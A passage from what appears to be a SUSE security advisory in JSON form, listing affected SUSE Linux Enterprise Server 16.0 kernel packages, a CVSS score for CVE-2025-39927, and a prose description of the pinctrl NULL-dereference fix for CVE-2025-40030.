"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-39927"
},
{
"cve": "CVE-2025-40030",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40030"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npinctrl: check the return value of pinmux_ops::get_function_name()\n\nWhile the API contract in docs doesn\u0027t specify it explicitly, the\ngeneric implementation of the get_function_name() callback from struct\npinmux_ops - pinmux_generic_get_function_name() - can fail and return\nNULL. This is already checked in pinmux_check_ops() so add a similar\ncheck in pinmux_func_name_to_selector() instead of passing the returned\npointer right down to strcmp() where the NULL can get dereferenced. This\nis normal operation when adding new pinfunctions.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40030",
"url": "https://www.suse.com/security/cve/CVE-2025-40030"
},
{
"category": "external",
"summary": "SUSE Bug 1252773 for CVE-2025-40030",
